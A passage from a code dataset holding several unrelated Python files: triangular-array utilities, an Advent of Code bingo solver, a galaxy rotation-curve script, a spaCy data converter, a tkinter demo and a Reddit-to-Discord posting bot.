batch(size, iterable):\r\n return 
list(xbatch(size, iterable))\r\n\r\ndef peek(iterable, size=1):\r\n objs = []\r\n for _ in range(size):\r\n try:\r\n obj = next(iterable)\r\n except StopIteration:\r\n break\r\n objs.append(obj)\r\n return objs, itertools.chain(objs, iterable)\r\n\r\nclass Bracket(object):\r\n def __init__(self, interval, interval_offset):\r\n self.interval = interval\r\n self.interval_offset = interval_offset\r\n self._str_Bracket = None\r\n \r\n def __eq__(self, other):\r\n return self.interval == other.interval and self.interval_offset == other.interval_offset\r\n \r\n def __str__(self):\r\n if self._str_Bracket is None:\r\n self._str_Bracket = '{' + str(self.interval) + ', ' + str(self.interval_offset) + '}'\r\n return self._str_Bracket\r\n \r\n def __repr__(self):\r\n return str(self)\r\n\r\ndef bracket(iterable, origin, interval_size, already_sorted=False, intervals_right_closed=False, coalesce=False):\r\n if not already_sorted:\r\n sorted_indices, iterable = zip(*sorted([(i, v) for i, v in enumerate(iterable)], key=operator.itemgetter(1)))\r\n \r\n brackets = []\r\n bracket_indices = []\r\n \r\n interval_offset = None\r\n interval_left = None\r\n interval_right = None\r\n \r\n for x in iterable:\r\n if interval_offset is None or x - interval_left >= interval_size:\r\n new_interval_offset = (x - origin) // interval_size\r\n new_interval_left = origin + new_interval_offset * interval_size\r\n \r\n if intervals_right_closed and x == new_interval_left:\r\n new_interval_offset -= 1\r\n new_interval_left -= interval_size\r\n \r\n if coalesce and (interval_offset is not None) and (new_interval_left <= brackets[-1].interval.right):\r\n interval_right = new_interval_left + interval_size\r\n brackets[-1].interval = brackets[-1].interval.replace_right(interval_right)\r\n elif interval_offset is None or new_interval_offset != interval_offset:\r\n interval_offset = new_interval_offset\r\n interval_left = new_interval_left\r\n interval_right = interval_left + interval_size\r\n brackets.append(\r\n Bracket(intervals.Interval(interval_left,\r\n interval_right,\r\n not intervals_right_closed,\r\n intervals_right_closed),\r\n interval_offset))\r\n \r\n bracket_indices.append(len(brackets) - 1)\r\n \r\n if not already_sorted:\r\n new_bracket_indices = [None] * len(bracket_indices)\r\n for i in range(len(bracket_indices)):\r\n new_bracket_indices[sorted_indices[i]] = bracket_indices[i]\r\n bracket_indices = new_bracket_indices\r\n \r\n return brackets, bracket_indices\r\n\r\nclass FlatStoredArray(object):\r\n def __init__(self, *args):\r\n self.__count = self._getcount(*args)\r\n self._data = [None] * self.__count\r\n \r\n def _getcount(self):\r\n raise NotImplementedError('Pure virtual method')\r\n \r\n def _keytoindex(self, key):\r\n raise NotImplementedError('Pure virtual method')\r\n \r\n def _indextokey(self, index):\r\n raise NotImplementedError('Pure virtual method')\r\n\r\n def __getitem__(self, key):\r\n return self._data[self._keytoindex(key)]\r\n \r\n def __setitem__(self, key, value):\r\n self._data[self._keytoindex(key)] = value\r\n \r\n def __len__(self):\r\n return self.__count\r\n \r\n def __str__(self):\r\n return str(self._data)\r\n \r\n def __repr__(self):\r\n return repr(self._data)\r\n \r\n def setall(self, iterable):\r\n for i, v in enumerate(iterable):\r\n if i >= self.__count: break\r\n self._data[i] = v\r\n \r\n class __Iterator(object):\r\n def __init__(self, data):\r\n self._data = data\r\n self.__idx = 0\r\n \r\n def __iter__(self):\r\n return self\r\n \r\n def __next__(self):\r\n if 
self.__idx < len(self._data):\r\n                v = self._data[self.__idx]\r\n                self.__idx += 1\r\n                return v\r\n            raise StopIteration()\r\n\r\n    def __iter__(self):\r\n        return FlatStoredArray.__Iterator(self._data)\r\n    \r\n    class __KeysIterator(object):\r\n        def __init__(self, collection):\r\n            self.__collection = collection\r\n            self.__idx = 0\r\n            \r\n        def __iter__(self):\r\n            return self\r\n        \r\n        def __next__(self):\r\n            if self.__idx < len(self.__collection):\r\n                k = self.__collection._indextokey(self.__idx)\r\n                self.__idx += 1\r\n                return k\r\n            raise StopIteration()\r\n    \r\n    def keys(self):\r\n        return FlatStoredArray.__KeysIterator(self)\r\n\r\n    class __ItemsIterator(object):\r\n        def __init__(self, data, collection):\r\n            self.__data = data\r\n            self.__collection = collection\r\n            self.__idx = 0\r\n            \r\n        def __iter__(self):\r\n            return self\r\n        \r\n        def __next__(self):\r\n            if self.__idx < len(self.__data):\r\n                k = self.__collection._indextokey(self.__idx)\r\n                v = self.__data[self.__idx]\r\n                self.__idx += 1\r\n                return k, v\r\n            raise StopIteration()\r\n    \r\n    def items(self):\r\n        return FlatStoredArray.__ItemsIterator(self._data, self)\r\n    \r\nclass DiagonalArray(FlatStoredArray):\r\n    def __init__(self, dim):\r\n        super(DiagonalArray, self).__init__(dim)\r\n        self.__dim = dim\r\n        \r\n    @property\r\n    def dim(self): return self.__dim\r\n    \r\n    @classmethod\r\n    def _getcount(cls, dim):\r\n        return (dim*dim + dim) // 2\r\n    \r\n    @classmethod\r\n    def _keytoindex(cls, key):\r\n        i, j = key[0], key[1]\r\n        if i < j: i, j = j, i\r\n        return (i*i + i) // 2 + j\r\n    \r\n    @classmethod\r\n    def _indextokey(cls, index):\r\n        i = int(math.sqrt(2*index))\r\n        n = (i*i + i) // 2\r\n        j = index - n\r\n        if j < 0:\r\n            i -= 1\r\n            n = (i*i + i) // 2\r\n            j = index - n\r\n        return i, j\r\n    \r\n    @classmethod\r\n    def mindim(cls, count):\r\n        dim = int(math.sqrt(2*count))\r\n        if cls._getcount(dim) < count:\r\n            dim += 1\r\n        return dim\r\n    \r\n    @classmethod\r\n    def create(cls, obj):\r\n        if isinstance(obj, DiagonalArray):\r\n            res = DiagonalArray(obj.dim)\r\n            res.setall(obj)\r\n        elif isinstance(obj, SubdiagonalArray):\r\n            res = DiagonalArray(obj.dim)\r\n            # Copy element-wise into the newly created array.\r\n            for k, v in obj.items():\r\n                res[k] = v\r\n        else:\r\n            res = DiagonalArray(cls.mindim(len(obj)))\r\n            res.setall(obj)\r\n        return res\r\n    \r\n    def tonumpyarray(self, fill=None, symmetric=False):\r\n        import numpy as np\r\n        if fill is None: fill = np.nan\r\n        res = np.empty((self.__dim, self.__dim))\r\n        idx = 0\r\n        for i in range(self.__dim):\r\n            for j in range(i+1):\r\n                res[i,j] = self._data[idx]\r\n                if symmetric: res[j,i] = res[i,j]\r\n                idx += 1\r\n            if not symmetric: res[i,i+1:self.__dim] = fill\r\n        return res\r\n    \r\n
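# Illustrative sketch (added for clarity; not part of the original module):\r\n# DiagonalArray stores the lower triangle of a symmetric matrix, diagonal\r\n# included, as a flat list; a key (i, j) with i >= j maps to (i*i + i)//2 + j.\r\n#\r\n# da = DiagonalArray(3)   # holds (3*3 + 3)//2 == 6 values\r\n# da[2, 0] = 5.0          # stored at flat index (2*2 + 2)//2 + 0 == 3\r\n# assert da[0, 2] == 5.0  # keys are symmetric: (0, 2) resolves to (2, 0)\r\n\r\n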
class SubdiagonalArray(FlatStoredArray):\r\n    def __init__(self, dim):\r\n        super(SubdiagonalArray, self).__init__(dim)\r\n        self.__dim = dim\r\n        \r\n    @property\r\n    def dim(self): return self.__dim\r\n    \r\n    @classmethod\r\n    def _getcount(cls, dim):\r\n        return (dim*dim - dim) // 2\r\n    \r\n    @classmethod\r\n    def _keytoindex(cls, key):\r\n        i, j = key[0], key[1]\r\n        if i < j: i, j = j, i\r\n        return (i*i - i) // 2 + j\r\n\r\n    @classmethod\r\n    def _indextokey(cls, index):\r\n        i = int(math.sqrt(2*index)) + 1\r\n        n = (i*i - i) // 2\r\n        j = index - n\r\n        if j < 0:\r\n            i -= 1\r\n            n = (i*i - i) // 2\r\n            j = index - n\r\n        return i, j\r\n    \r\n    @classmethod\r\n    def mindim(cls, count):\r\n        dim = int(math.sqrt(2*count)) + 1\r\n        if cls._getcount(dim) < count:\r\n            dim += 1\r\n        return dim\r\n    \r\n    @classmethod\r\n    def create(cls, obj):\r\n        if isinstance(obj, SubdiagonalArray):\r\n            res = SubdiagonalArray(obj.dim)\r\n            res.setall(obj)\r\n        elif isinstance(obj, DiagonalArray):\r\n            res = SubdiagonalArray(obj.dim)\r\n            # Copy element-wise, skipping the diagonal, into the newly created array.\r\n            for k, v in obj.items():\r\n                if k[0] != k[1]: res[k] = v\r\n        else:\r\n            res = SubdiagonalArray(cls.mindim(len(obj)))\r\n            res.setall(obj)\r\n        return res\r\n\r\n    def tonumpyarray(self, fill=None, symmetric=False):\r\n        import numpy as np\r\n        if fill is None: fill = np.nan\r\n        res = np.empty((self.__dim, self.__dim))\r\n        idx = 0\r\n        for i in range(self.__dim):\r\n            for j in range(i):\r\n                res[i,j] = self._data[idx]\r\n                if symmetric: res[j,i] = res[i,j]\r\n                idx += 1\r\n            res[i,i] = fill\r\n            if not symmetric: res[i,i+1:self.__dim] = fill\r\n        return res\r\n","repo_name":"timothyyu/ml_monorepo","sub_path":"tsa/src/main/python/thalesians/tsa/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12254,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"20117856638","text":"draws = []\nboards = []\nwith open('input.txt', 'r') as file:\n    data = file.read().split('\\n\\n')\n\ndraws = [int(x) for x in data[0].split(',')]\nraw_boards = [x.split('\\n') for x in data[1:]]\n\nboards = []\nfor board in raw_boards:\n    new_board = []\n    print(board)\n    for row in board:\n        new_row = row.split()\n        print(new_row)\n        new_row = [int(x) for x in new_row]\n        if new_row != []:\n            new_board.append(new_row) \n\n    boards.append(new_board)\n\nprint(boards)\n\ndef check_row_or_column(board):\n    for row in board:\n        if all(element == row[0] for element in row):\n            return True\n\n    transposed = list(zip(*board))\n    transposed = [list(sublist) for sublist in transposed]\n    for column in transposed:\n        if all(element == column[0] for element in column):\n            return True\n\ndef cal_vals(board):\n    total_val = 0\n    for row in board:\n        for column in row:\n            if not column is None:\n                total_val += column\n    return total_val\n\nfound = False\nval = 0\nlast_draw = None\nwinning_boards = []\nlast = None\nfor draw in draws:\n    print('DRAW', draw)\n\n    if found:\n        break\n\n    last_draw = draw\n\n    for i, board in enumerate(boards):\n        #if i in winning_boards:\n        #    break;\n        for j, row in enumerate(board):\n            for k, item in enumerate(row):\n                if item == draw:\n                    boards[i][j][k] = None\n\n        print(len(winning_boards), len(boards) - 1)\n        if check_row_or_column(board) and i not in winning_boards:\n            winning_boards.append(i)\n            last = i\n\n        if check_row_or_column(board) and len(winning_boards) == len(boards):\n            found = True \n            break\n\n    print(winning_boards)\n    print('\\n'.join([str(board) for board in boards]))\n\n# Score the last board to win, which is tracked in 'last'.\nval = cal_vals(boards[last]) \nprint(last)\nprint(val * last_draw)\n","repo_name":"rubengrootroessink/AdventOfCode","sub_path":"2021/04/2_old.py","file_name":"2_old.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14034922155","text":"\"\"\"\nMain script file for 'rotation_curve_vX_X.'\n\"\"\"\nimport datetime\nSTART = datetime.datetime.now()\n\nimport glob, os.path, warnings\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\n'''\nimport matplotlib.pyplot as plt\nimport pickle, psutil\nprocess = psutil.Process(os.getpid())\nmemory_list = []\n'''\nwarnings.simplefilter('ignore', np.RankWarning)\n\n###############################################################################\n# File format for saved images\n#------------------------------------------------------------------------------\nIMAGE_FORMAT = 
'eps'\n###############################################################################\n\n###############################################################################\n# Boolean variable to specify if the script is being run in Bluehive.\n#------------------------------------------------------------------------------\nWORKING_IN_BLUEHIVE = False\nRUN_ALL_GALAXIES = False\n###############################################################################\n\n###############################################################################\n# List of files (in \"[MaNGA_plate]-[MaNGA_fiberID]\" format) to be ran through\n# the individual galaxy version of this script.\n#------------------------------------------------------------------------------\nFILE_IDS = ['8158-12704']\n###############################################################################\n\n\n###############################################################################\n# 'LOCAL_PATH' should be updated depending on the file structure (e.g. if\n# working in bluehive). It is set to 'os.path.dirname(__file__)' when\n# working on a local system.\n#\n# In addition, 'LOCAL_PATH' is altered and 'SCRATCH_PATH' is added if\n# 'WORKING_IN_BLUEHIVE' is set to True. This is done because of how the data\n# folders are kept separate from the python script files in bluehive. For\n# BlueHive to run, images cannot be generated with $DISPLAY keys; therefore,\n# 'matplotlib' is imported and 'Agg' is used. This must be done before\n# 'matplotlib.pyplot' is imported.\n#\n# This block can be altered if desired, but the conditional below is tailored\n# for use with bluehive.\n#\n# ATTN: 'MANGA_FOLDER' must be manually altered according to the data release\n# being ran.\n#------------------------------------------------------------------------------\nif WORKING_IN_BLUEHIVE:\n import matplotlib\n matplotlib.use('Agg')\n\n LOCAL_PATH = '/home/jsm171'\n SCRATCH_PATH = '/scratch/jsm171'\n\n IMAGE_DIR = SCRATCH_PATH + '/images'\n #MANGA_FOLDER = SCRATCH_PATH + '/manga_files/dr15'\n ROT_CURVE_MASTER_FOLDER = SCRATCH_PATH + '/rot_curve_data_files'\n\nelse:\n LOCAL_PATH = os.path.dirname(__file__)\n if LOCAL_PATH == '':\n LOCAL_PATH = '.'\n\n IMAGE_DIR = LOCAL_PATH + '/images'\n #MANGA_FOLDER = LOCAL_PATH + '/manga_files/dr15'\n ROT_CURVE_MASTER_FOLDER = LOCAL_PATH + '/rot_curve_data_files'\n\nROT_CURVE_DATA_INDICATOR = '_rot_curve_data'\nGAL_STAT_DATA_INDICATOR = '_gal_stat_data'\n#import matplotlib.pyplot as plt\n\n# Create output directories if they do not already exist\nif not os.path.isdir( IMAGE_DIR):\n os.makedirs( IMAGE_DIR)\nif not os.path.isdir( ROT_CURVE_MASTER_FOLDER):\n os.makedirs( ROT_CURVE_MASTER_FOLDER)\n###############################################################################\n\n\n###############################################################################\n# Import functions from 'rotation_curve_vX_X.'\n#------------------------------------------------------------------------------\nfrom rotation_curve_v2_1 import extract_data, \\\n match_to_NSA, \\\n calc_rot_curve, \\\n write_rot_curve, \\\n write_master_file\n###############################################################################\n\n\n###############################################################################\n# Create list of galaxy IDs to extract a rotation curve from.\n#------------------------------------------------------------------------------\nif RUN_ALL_GALAXIES:\n FILE_IDS = 
[]\n###############################################################################\n\n\n###############################################################################\n# Extract the length of the FILE_IDS array for future use in creating the\n# 'master_table.'\n#------------------------------------------------------------------------------\nN_gals = len( FILE_IDS)\n###############################################################################\n\n'''\n###############################################################################\n# Print the list of file names.\n#------------------------------------------------------------------------------\nprint(\"files:\", files)\n###############################################################################\n'''\n\n###############################################################################\n# Open NASA-Sloan-Atlas (NSA) master catalog and extract the data structures\n# for RA; DEC; the axes ratio of b/a (obtained via sersic fit); phi, the\n# angle of rotation in the two-dimensional, observational plane (obtained\n# via sersic fit); and the redshift distance calculated from the shift in\n# H-alpha flux.\n#\n# Note: The NSA RA and DEC are passed to a SkyCoord object to better match\n# galaxies to the NSA catalog index.\n#------------------------------------------------------------------------------\nif WORKING_IN_BLUEHIVE:\n    nsa_catalog = fits.open( SCRATCH_PATH + '/nsa_v0_1_2.fits')\nelse:\n    #nsa_catalog = fits.open( LOCAL_PATH + '/nsa_v0_1_2.fits')\n    nsa_catalog = fits.open('/Users/kellydouglass/Documents/Drexel/Research/Data/nsa_v0_1_2.fits')\n\nnsa_axes_ratio_all = nsa_catalog[1].data['SERSIC_BA']\nnsa_phi_EofN_deg_all = nsa_catalog[1].data['SERSIC_PHI']\nnsa_z_all = nsa_catalog[1].data['Z']\n#nsa_zdist_all = nsa_catalog[1].data['ZDIST']\n#nsa_zdist_all_err = nsa_catalog[1].data['ZDIST_ERR']\nnsa_mStar_all = nsa_catalog[1].data['MASS']\n\nnsa_ra_all = nsa_catalog[1].data['RA']\nnsa_dec_all = nsa_catalog[1].data['DEC']\nnsa_plate_all = nsa_catalog[1].data['PLATE']\nnsa_fiberID_all = nsa_catalog[1].data['FIBERID']\nnsa_mjd_all = nsa_catalog[1].data['MJD']\nnsaID_all = nsa_catalog[1].data['NSAID']\n\nnsa_catalog.close()\n\ncatalog_coords = SkyCoord( ra = nsa_ra_all*u.degree, \n                           dec = nsa_dec_all*u.degree)\n###############################################################################\n\n\n###############################################################################\n# Initialize the master arrays that create the structure of the master file.\n# N_gals (the number of galaxies in FILE_IDS) sets the length of each array.\n#------------------------------------------------------------------------------\nmanga_plate_master = -1 * np.ones( N_gals)\nmanga_fiberID_master = -1 * np.ones( N_gals)\n\nnsa_axes_ratio_master = -1 * np.ones( N_gals)\nnsa_phi_master = -1 * np.ones( N_gals)\nnsa_z_master = -1 * np.ones( N_gals)\n#nsa_zdist_master = -1 * np.ones( N_gals)\n#nsa_zdist_err_master = -1 * np.ones( N_gals)\nnsa_mStar_master = -1 * np.ones( N_gals)\n\nnsa_ra_master = -1 * np.ones( N_gals)\nnsa_dec_master = -1 * np.ones( N_gals)\nnsa_plate_master = -1 * np.ones( N_gals)\nnsa_fiberID_master = -1 * np.ones( N_gals)\nnsa_mjd_master = -1 * np.ones( N_gals)\nnsaID_master = -1 * np.ones( N_gals)\n###############################################################################\n\n'''\n###############################################################################\n# Create an array to store the time spent on each iteration of the for-loop.\n# This is used to clock the algorithm for 
analysis.\n#------------------------------------------------------------------------------\niteration_times = []\n###############################################################################\n'''\n\n###############################################################################\n# This for loop runs through the necessary calculations to calculate and write\n# the rotation curve for all of the galaxies in the FILE_IDS array.\n#------------------------------------------------------------------------------\nfor i in range( N_gals):\n# iteration_start = datetime.datetime.now()\n gal_ID = FILE_IDS[i]\n\n \n ###########################################################################\n # Extract the necessary data from the .fits file via marvin.\n #--------------------------------------------------------------------------\n Ha_vel, Ha_vel_error, v_band, v_band_err, sMass_density, \\\n manga_plate, manga_fiberID, gal_ra, gal_dec = extract_data( gal_ID)\n print( gal_ID, \" EXTRACTED\")\n ###########################################################################\n\n\n ###########################################################################\n # Add the MaNGA catalog information to the master arrays.\n #--------------------------------------------------------------------------\n manga_plate_master[i] = manga_plate\n manga_fiberID_master[i] = manga_fiberID\n ###########################################################################\n\n\n ###########################################################################\n # Match the galaxy's RA and DEC from the to the NSA catalog index, and pull\n # out the matched data from the NSA catalog.\n #--------------------------------------------------------------------------\n nsa_gal_idx = match_to_NSA( gal_ra, gal_dec, catalog_coords)\n print(gal_ID, \" MATCHED\")\n\n axes_ratio = nsa_axes_ratio_all[ nsa_gal_idx]\n phi_EofN_deg = nsa_phi_EofN_deg_all[ nsa_gal_idx] * u.degree\n z = nsa_z_all[ nsa_gal_idx]\n# zdist = nsa_zdist_all[ nsa_gal_idx]\n# zdist_err = nsa_zdist_all_err[ nsa_gal_idx]\n mStar = nsa_mStar_all[ nsa_gal_idx] * u.M_sun\n\n nsa_ra = nsa_ra_all[ nsa_gal_idx]\n nsa_dec = nsa_dec_all[ nsa_gal_idx]\n nsa_plate = nsa_plate_all[ nsa_gal_idx]\n nsa_fiberID = nsa_fiberID_all[ nsa_gal_idx]\n nsa_mjd = nsa_mjd_all[ nsa_gal_idx]\n nsaID = nsaID_all[ nsa_gal_idx]\n ###########################################################################\n\n\n ###########################################################################\n # Add the NSA catalog information to the master arrays.\n #--------------------------------------------------------------------------\n nsa_axes_ratio_master[i] = axes_ratio\n nsa_phi_master[i] = phi_EofN_deg / u.degree\n nsa_z_master[i] = z\n# nsa_zdist_master[i] = zdist\n# nsa_zdist_err_master[i] = zdist_err\n nsa_mStar_master[i] = mStar / u.M_sun\n\n nsa_ra_master[i] = nsa_ra\n nsa_dec_master[i] = nsa_dec\n nsa_plate_master[i] = nsa_plate\n nsa_fiberID_master[i] = nsa_fiberID\n nsa_mjd_master[i] = nsa_mjd\n nsaID_master[i] = nsaID\n ###########################################################################\n\n\n ###########################################################################\n # Extract rotation curve data for the .fits file in question and create an\n # astropy Table containing said data.\n #--------------------------------------------------------------------------\n rot_data_table, gal_stat_table = calc_rot_curve( Ha_vel, Ha_vel_error, \n v_band, v_band_err, \n sMass_density, axes_ratio, \n phi_EofN_deg, z, gal_ID, 
\n IMAGE_DIR, IMAGE_FORMAT)\n print(gal_ID, \" ROT CURVE CALCULATED\")\n ###########################################################################\n\n\n ###########################################################################\n # Write the rotation curve data to a text file in ascii format.\n #\n # IMPORTANT: rot_curve_main.py writes the data files into the default\n # folder 'rot_curve_data_files'. It also saves the file with the\n # default extension '_rot_curve_data'.\n #--------------------------------------------------------------------------\n write_rot_curve( rot_data_table, gal_stat_table, gal_ID, \n ROT_CURVE_MASTER_FOLDER, ROT_CURVE_DATA_INDICATOR, \n GAL_STAT_DATA_INDICATOR)\n print(gal_ID, \" WRITTEN\")\n ###########################################################################\n\n '''\n ###########################################################################\n # Clock the current iteration and append the time to 'iteration_times'\n # which is plotted below.\n #--------------------------------------------------------------------------\n iteration_end = datetime.datetime.now() - iteration_start\n print(\"ITERATION TIME:\", iteration_end)\n iteration_times.append( iteration_end.total_seconds())\n ###########################################################################\n '''\n '''\n print('Loop number:', loop_num)\n print('manga_data_release_master length:', len(manga_data_release_master), len(pickle.dumps(manga_data_release_master)))\n print('manga_plate_master length:', len(manga_plate_master), len(pickle.dumps(manga_plate_master)))\n print('manga_fiberID_master length:', len(manga_fiberID_master), len(pickle.dumps(manga_fiberID_master)))\n print('nsa_axes_ratio_master length:', len(nsa_axes_ratio_master), len(pickle.dumps(nsa_axes_ratio_master)))\n print('nsa_phi_master length:', len(nsa_phi_master), len(pickle.dumps(nsa_phi_master)))\n print('nsa_zdist_master length:', len(nsa_zdist_master), len(pickle.dumps(nsa_zdist_master)))\n print('nsa_zdist_err_master length:', len(nsa_zdist_err_master), len(pickle.dumps(nsa_zdist_err_master)))\n print('nsa_mStar_master length:', len(nsa_mStar_master), len(pickle.dumps(nsa_mStar_master)))\n print('nsa_ra_master length:', len(nsa_ra_master), len(pickle.dumps(nsa_ra_master)))\n print('nsa_dec_master length:', len(nsa_dec_master), len(pickle.dumps(nsa_dec_master)))\n print('nsa_plate_master length:', len(nsa_plate_master), len(pickle.dumps(nsa_plate_master)))\n print('nsa_fiberID_master length:', len(nsa_fiberID_master), len(pickle.dumps(nsa_fiberID_master)))\n print('nsa_mjd_master length:', len(nsa_mjd_master), len(pickle.dumps(nsa_mjd_master)))\n print('nsaID_master length:', len(nsaID_master), len(pickle.dumps(nsaID_master)))\n print('Memory usage (bytes):', process.memory_info().rss)\n\n memory_list.append( process.memory_info().rss)\n '''\n\n print(\"\\n\")\n# ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~\n\n'''\n###############################################################################\n# Histogram the iteration time for each loop.\n#------------------------------------------------------------------------------\n#BINS = np.linspace( 0, 18, 37)\n\niteration_clock_fig = plt.figure()\nplt.title('Iteration Time Histogram')\nplt.xlabel('Iteration Time [sec]')\nplt.ylabel('Percentage of Galaxies')\n#plt.xticks( np.arange( 0, 19, 1))\nplt.hist( iteration_times,\n# BINS,\n color='indianred', density=True)\nplt.savefig( IMAGE_DIR + \"/histograms/iteration_clock_hist\",\n 
format=image_format)\nplt.show()\nplt.close()\ndel iteration_clock_fig\n###############################################################################\n'''\n'''\n###############################################################################\n# Build master file that contains identifying information for each galaxy\n# as well as scientific information as taken from the NSA catalog.\n#------------------------------------------------------------------------------\nwrite_master_file( manga_plate_master, manga_fiberID_master,\n nsa_plate_master, nsa_fiberID_master, nsa_mjd_master,\n nsaID_master, nsa_ra_master, nsa_dec_master,\n nsa_axes_ratio_master, nsa_phi_master, nsa_z_master,\n nsa_mStar_master,\n LOCAL_PATH)\nprint(\"MASTER FILE WRITTEN\")\n###############################################################################\n'''\n\n###############################################################################\n# Clock the program's run time to check performance.\n#------------------------------------------------------------------------------\nFINISH = datetime.datetime.now()\nprint(\"Runtime:\", FINISH - START)\n###############################################################################\n\n'''\n###############################################################################\n# Plot memory usage for each galaxy\n#------------------------------------------------------------------------------\nplt.figure()\nplt.plot(memory_list, '.')\nplt.xlabel('Iteration number')\nplt.ylabel('Memory usage [bytes]')\nplt.show()\n###############################################################################\n'''","repo_name":"kadglass/RotationCurves","sub_path":"spirals/Marvin_rot_curve_main.py","file_name":"Marvin_rot_curve_main.py","file_ext":"py","file_size_in_byte":16889,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9950493405","text":"import sys\nimport json\n\n\nfo = open(sys.argv[1], \"r\")\n\nlines = fo.readlines()\n\n\nfor line in lines:\n line = json.loads(line)\n if \"labels\" in line:\n line[\"entities\"] = line.pop(\"labels\")\n else:\n line[\"entities\"] = []\n\n tmp_ents = []\n for e in line[\"entities\"]:\n if e[2] in ['NAME', 'COMPANIES WORKED AT', 'DESIGNATION', 'YEARS OF EXPERIENCE', 'LOC', 'SKILLS', 'DEGREE', 'EMAIL ADDRESS', 'GRADIATION YEAR', 'COLLEGE NAME', 'DOB', 'PHONE NUMBER', 'LANGUAGES', 'INTERESTS', 'LINKS']:\n tmp_ents.append({\"start\": e[0], \"end\": e[1], \"label\": e[2]})\n\n line[\"entities\"] = tmp_ents\n\n if (len(line[\"text\"]) > 5):\n print(json.dumps({\"entities\": line[\"entities\"], \"text\": line[\"text\"]}))\n","repo_name":"MathisZerbib/CV-extract","sub_path":"back/convert_to_spacy.py","file_name":"convert_to_spacy.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12349416395","text":"#Frames\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n#showinfo, showwarning, showerror, askquestion, askokcancel, askyesno\r\n\r\nmain = Tk()\r\nmain.title('Message')\r\n\r\n#defining functions \r\ndef popup():\r\n response = messagebox.askquestion(\"Pop up\", \"testing\")\r\n Label(main, text=response).pack()\r\n if response == \"yes\":\r\n Label(main, text=\"You clicked yes\").pack()\r\n else:\r\n Label(main, text=\"you clicked no\").pack()\r\n \r\n\r\n#creating a button\r\nButton(main, text=\"Pop up\", 
command=popup).pack()\r\n\r\n\r\nmainloop()\r\n","repo_name":"RuhanAsiph/testingTkinter","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73147343093","text":"import praw, discord, time\r\nfrom discord.ext import tasks\r\nfrom datetime import datetime\r\n\r\nclass MyClient(discord.Client):\r\n def __init__(self, unfiltered_channel_id, filtered_channel_id,\r\n subreddit, tracker, inclusive, exclusive):\r\n super().__init__()\r\n \r\n self.ufci = unfiltered_channel_id\r\n self.fci = filtered_channel_id\r\n \r\n self.sub = subreddit\r\n self.tracker = tracker\r\n self.inc = inclusive\r\n self.exc = exclusive\r\n\r\n # start the task to run in the background\r\n self.getNewPost.start()\r\n\r\n async def on_ready(self):\r\n print(f'Logged in as {self.user}')\r\n print('------')\r\n\r\n @tasks.loop(seconds=300) # task runs every 5 minutes in background\r\n async def getNewPost(self):\r\n ufchannel = self.get_channel(self.ufci)\r\n fchannel = self.get_channel(self.fci)\r\n \r\n newest = \"\"\r\n temp = []\r\n for post in self.sub.new(limit=25, params={'before': self.tracker}): #before = new posts made after the tracker post (since its collected in reverse order)\r\n temp.append(post)\r\n if newest == \"\":\r\n newest = post.fullname\r\n print(f\"Req made on {convert(round(time.time()))}\") \r\n if temp !=[]:\r\n temp.reverse()\r\n file = open('history.txt', 'a')\r\n for post in temp:\r\n file.write(f'{post.title}\\n{convert(post.created_utc)} {post.link_flair_text}\\n{post.shortlink} - {post.fullname}\\n-----')\r\n await ufchannel.send(f'**{post.title}**\\n{convert(post.created_utc)} `{post.link_flair_text}`\\n{post.shortlink} @here - {post.fullname}')\r\n if self.inc in post.title and self.exc not in post.title:\r\n await fchannel.send(f'**{post.title}**\\n{convert(post.created_utc)} `{post.link_flair_text}`\\n{post.shortlink} @here - {post.fullname}')\r\n\r\n if newest != \"\":\r\n self.tracker = newest\r\n with open('data.txt') as f:\r\n lines = f.readlines()\r\n f = open('data.txt', 'w')\r\n for line in lines:\r\n t = line.split(' = ')[0]\r\n if t == \"post_tracker\":\r\n f.write(f'{t} = {self.tracker}\\n')\r\n else:\r\n f.write(line)\r\n f.close()\r\n file.close()\r\n\r\n @getNewPost.before_loop\r\n async def before_my_task(self):\r\n await self.wait_until_ready() # wait until the bot logs in\r\n\r\n\"\"\"\r\npost_tracker = 't3_r6457q' 2021 Dec 01 first post\r\n\"\"\"\r\n\r\ndef convert(time):\r\n replace = {'-01-': 'Jan', '-02-': 'Feb', '-03-': 'Mar', '-04-': 'Apr', '-05-': 'May', '-06-': 'Jun',\r\n '-07-': 'Jul', '-08-': 'Aug', '-09-': 'Sep', '-10-': 'Oct', '-11-': 'Nov', '-12-': 'Dec'}\r\n time = str(datetime.fromtimestamp(time))\r\n for month in replace:\r\n if month in time:\r\n a, b = time.split(month)\r\n return f'{replace[month]} {b[:-3]}'\r\n\r\n#reading in data.txt\r\ndata = []\r\nwith open('data.txt') as file:\r\n for x in range(10):\r\n data.append((file.readline().strip('\\n')).split(' = ')[1])\r\n data[6], data[7] = int(data[6]), int(data[7])\r\n\r\nreddit = praw.Reddit(client_id = data[1],\r\n client_secret = data[2],\r\n user_agent = data[3],\r\n check_for_async=False)\r\n\r\nLM = reddit.subreddit(data[4])\r\n\r\nclient = MyClient(data[6], data[7],\r\n LM, data[0], data[8], data[9])\r\n\r\nclient.run(data[5])\r\n\r\ninput(\"PRESS ENTER TO 
